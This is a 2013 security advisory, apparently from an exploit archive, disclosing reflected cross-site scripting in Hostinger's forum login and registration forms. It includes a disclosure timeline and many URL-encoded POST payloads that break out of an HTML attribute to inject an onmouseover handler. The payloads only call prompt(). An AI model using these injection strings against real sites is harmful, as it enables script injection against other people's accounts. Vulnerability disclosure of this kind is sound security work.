Hostinger Web Hosting Cross Site Scripting

Hostinger Web Hosting Cross Site Scripting: Posted Jun 17, 2013; Authored by Juan Carlos Garcia; Hostinger Web Hosting suffers from multiple cross site scripting vulnerabilities.; tags | exploit, web, vulnerability, xss; SHA-256 | d4df1d9a2179f68c53b64dfbdf8a2a1dd84c602165ca1cac6074386192683ec9; Download | Favorite | View

Hostinger Web Hosting Cross Site Scripting

Hostinger Web Hosting Multiple Cross Site Scripting


Report-Timeline:
================
2013-06-01:     Researcher Notification 
2013-06-03:     RESPONSE
2013-06-07:     Ask About the issues
2013-06-10:     Vendor Feedback
2013-06-13:     Not Fixed
2013-06-16:     Full Disclosure


I-VULNERABILITY
-------------------------
#Title: Hostinger Web Hosting Multiple Cross Site Scripting

#Vendor:http://www.hostinger.es

#Author:Juan Carlos García (@secnight)

#Follow me 
 http://www.highsec.es
 HTTP://WWW.radio3w.com
 http://hackingmadrid.blogspot.com
 http://blogs.0verl0ad.com
Twitter:@secnight
Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn


II-Introduction:
=============
Hostinger® is a free and affordable premium web hosting services provider and domain registrar.

Hostinger has grown from a small web hosting provider into a world leading and industry recognized 

web hosting brand. Hostinger, UAB is proud to be a part of elite ICANN accredited registrars community.

Hostinger has successfully localized services in Indonesia, Philippines, Spain, Italy, France, Poland, Romania, Lithuania, Brazil,

Argentina, Mexico, Columbia, Russia, Ukraine, and many more countries on their way!
-------------------------

III-PROOF OF CONCEPT
=============

Affected items

/forum/login (5)
/forum/register (8)

Attack details

/forum/login 
=============

URL encoded POST input email was set to " onmouseover=prompt(952323) bad="
The input is reflected inside a tag element between double quotes.

POST /forum/login HTTP/1.1

email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1

VARIANTS

email 2
-------

email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1

email=%22%20onmouseover%3dprompt%28982999%29%20bad%3d%22&pass=secnight


pass 3
-------

email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28952904%29%20bad%3d%22&remember=1

email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28935474%29%20bad%3d%22

email=secnight%40email.tst&pass=%22%20onmouseover%3dprompt%28993589%29%20bad%3d%22&remember=1


/forum/register. 
=============

URL encoded POST input confirmPass was set to " onmouseover=prompt(943546) bad="

The input is reflected inside a tag element between double quotes.

POST /forum/register HTTP/1.1

confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_chal


VARIANTS
----------
----------

confirmPass 2
-------------

confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Senight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=%22%20onmouseover%3dprompt%28942726%29%20bad%3d%22&email=secnight%40email.tst&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge


email 2
--------

confirmPass=secnight&email=%22%20onmouseover%3dprompt%28982353%29%20bad%3d%22&name=mvjmhkny&pass=Secnightx&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=secnightx&email=%22%20onmouseover%3dprompt%28978014%29%20bad%3d%22&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

Name 2
-------
confirmPass=secnight&email=secnight@email.tst&name=%22%20onmouseover%3dprompt%28981310%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=SECNIGHT&email=secnight%40email.tst&name=%22%20onmouseover%3dprompt%28946111%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge


pass 2
-------

confirmPass=secnight&email=secnight@email.tst&name=augbmecb&pass=%22%20onmouseover%3dprompt%28956301%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=secnightx&email=secnight%40email.tst&name=noeoyclk&pass=%22%20onmouseover%3dprompt%28972091%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge


IV. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Hostinger Web Hosting Cross Site Scripting

Hostinger Web Hosting Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Hostinger Web Hosting Cross Site Scripting

Share This

Hostinger Web Hosting Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems